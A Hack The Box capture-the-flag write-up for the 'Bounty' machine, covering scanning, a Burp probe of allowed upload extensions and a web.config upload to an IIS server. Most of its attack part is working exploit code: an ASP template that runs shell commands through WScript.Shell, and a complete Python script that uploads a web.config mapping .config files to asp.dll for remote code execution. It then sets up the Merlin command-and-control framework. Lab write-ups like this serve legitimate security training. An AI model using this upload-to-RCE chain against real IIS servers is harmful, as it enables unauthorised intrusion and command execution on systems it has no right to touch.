Hack the box write-up: Bounty

Nmap result:

Nmap scan report for 10.129.161.191
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

After the initial scan, I saw that only port 80 was open, so I did the directory scan:

gobuster dir -u http://10.129.161.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

It looks unstable, but I found transfer.aspx.

File server found!

Let's test which extensions are allowed, using Burp:

Intercept > attach a file and upload > send the request to Repeater > observe the response.

Make an extension wordlist (one extension per line).

Send the request to Intruder > Clear § (remove the automatic payload positions) > mark only the extension of the uploaded filename as the payload position.

Go to Payloads > Payload Options > Load > select the wordlist.

Start attack.

Only one of them had a response with Content-Length 1350, which was config, and that response showed it was uploaded successfully.

Uploading a web.config to an IIS server can bypass some of its security controls: a web.config applies to the directory it sits in and can add handler mappings and remove request-filtering rules, so an accepted .config upload can be turned into code execution.

gobuster showed an UploadedFiles directory.

Uploaded the web.config file and then requested it from the UploadedFiles directory.

It's showing 3, so the ASP embedded in the web.config is being executed, which is what the exploit is supposed to do.

ASP remote code execution template:

<%
' Classic ASP: spawn cmd.exe through WScript.Shell and echo its stdout into the response
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.ReadAll()
Response.Write(o)
%>
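The whole chain above (the Burp extension probe, the web.config upload and the ASP command-execution template) as one script. This is an added example, not the write-up's own code: it uses only the Python standard library and assumes the form details the page never shows, namely that transfer.aspx is a WebForms page whose hidden __VIEWSTATE-style fields must be echoed back, that the file input is named FileUpload1 and the submit button btnUpload (hypothetical names; take the real ones from the request captured in Burp), that uploads are served from /UploadedFiles/, and that the application pool is 64-bit. The web.config body is Soroush Dalili's well-known technique, not something specific to this box.

```python
"""Scripted version of the upload probe + web.config RCE chain (added example).

Assumptions not taken from the write-up: transfer.aspx is a WebForms page (its
hidden __VIEWSTATE-style fields must be echoed back), the file input is named
FILE_FIELD and the submit button SUBMIT_FIELD (hypothetical names), uploads are
served from /UploadedFiles/, and the app pool is 64-bit (preCondition bitness64).
"""
import re
import uuid
import urllib.request
from collections import Counter
from html import unescape

BASE_URL = "http://10.129.161.191"
UPLOAD_PATH = "/transfer.aspx"
UPLOADED_DIR = "/UploadedFiles/"
FILE_FIELD = "FileUpload1"   # assumed form field name
SUBMIT_FIELD = "btnUpload"   # assumed form field name
# The Intruder wordlist: extensions IIS might execute plus a few controls.
EXTENSIONS = ["aspx", "asp", "asa", "ashx", "asmx", "cer", "config", "htm", "txt", "jpg"]

HIDDEN_RE = re.compile(r'<input[^>]*name="(__[A-Z]+)"[^>]*value="([^"]*)"')

# Soroush Dalili's web.config technique: map *.config to asp.dll for this directory,
# un-block .config and the web.config hidden segment, carry ASP in an XML comment.
WEB_CONFIG_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Response.Write("-" & "->")
{asp}
Response.Write("<!-" & "-")
%>
-->
"""

# The write-up's ASP command-execution template, used as the default payload.
ASP_WHOAMI = """Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Response.Write(cmd.StdOut.ReadAll())"""


def scrape_hidden_fields(html):
    """Collect the hidden __* inputs that WebForms expects back on the POST."""
    return {name: unescape(value) for name, value in HIDDEN_RE.findall(html)}


def encode_multipart(fields, filename, content):
    """Hand-build a multipart/form-data body; returns (boundary, body bytes)."""
    boundary = "----probe" + uuid.uuid4().hex
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'.encode()
             for n, v in fields.items()]
    parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{FILE_FIELD}"; '
                 f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n\r\n'.encode()
                 + content + b"\r\n")
    parts.append(f"--{boundary}--\r\n".encode())
    return boundary, b"".join(parts)


def web_config_payload(asp_code=ASP_WHOAMI):
    """Embed ASP in the web.config, refusing code that would close the XML comment early."""
    if "--" in asp_code:
        raise ValueError('ASP code must not contain "--" inside the XML comment')
    return WEB_CONFIG_TEMPLATE.format(asp=asp_code)


def classify_responses(results):
    """Intruder by eye, in code: the majority response length is the rejected case;
    anything else (the page's single 1350-byte response) is a probable accepted upload."""
    majority = Counter(length for _, length in results.values()).most_common(1)[0][0]
    return {ext: r for ext, r in results.items() if r[1] != majority}


def upload(filename, content):
    """GET the form for its hidden fields, POST the file, return (status, body length)."""
    with urllib.request.urlopen(BASE_URL + UPLOAD_PATH) as resp:
        fields = scrape_hidden_fields(resp.read().decode(errors="replace"))
    fields[SUBMIT_FIELD] = "Upload"
    boundary, body = encode_multipart(fields, filename, content)
    req = urllib.request.Request(BASE_URL + UPLOAD_PATH, data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    with urllib.request.urlopen(req) as resp:
        return resp.status, len(resp.read())


if __name__ == "__main__":
    probe = {ext: upload(f"probe.{ext}", b"probe") for ext in EXTENSIONS}
    print("extensions worth a manual look:", classify_responses(probe))
    upload("web.config", web_config_payload().encode())
    with urllib.request.urlopen(BASE_URL + UPLOADED_DIR + "web.config") as resp:
        print(resp.read().decode(errors="replace"))   # whoami output if the ASP ran
```

Fix the two field names from the request captured in Burp before running it. classify_responses treats the majority Content-Length as the rejected case, which reproduces the single 1350-byte outlier seen in Intruder; web_config_payload refuses any ASP containing "--" because that would terminate the XML comment early and leave IIS with an unparsable web.config, and the two extra Response.Write lines close and reopen the comment in the output so the command result is visible in a browser rather than hidden inside an HTML comment.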

Since I confirmed that it allows code execution, I'm going to use Merlin.

Merlin is a post-exploitation command-and-control framework written in Go, a tool in the same space as Metasploit.

We need a server certificate and key inside the merlin/data/x509 directory.

To generate them, execute the command:

openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=gorigori.rocks" -days 7

After the server key and certificate are generated, run the program by typing "go run main.go".

For some reason, the box kept shutting down so I decided to stop working on it.

Full walkthrough is available from here: https://medium.com/@v1per/bounty-hackthebox-writeup-5b79a79e6de9
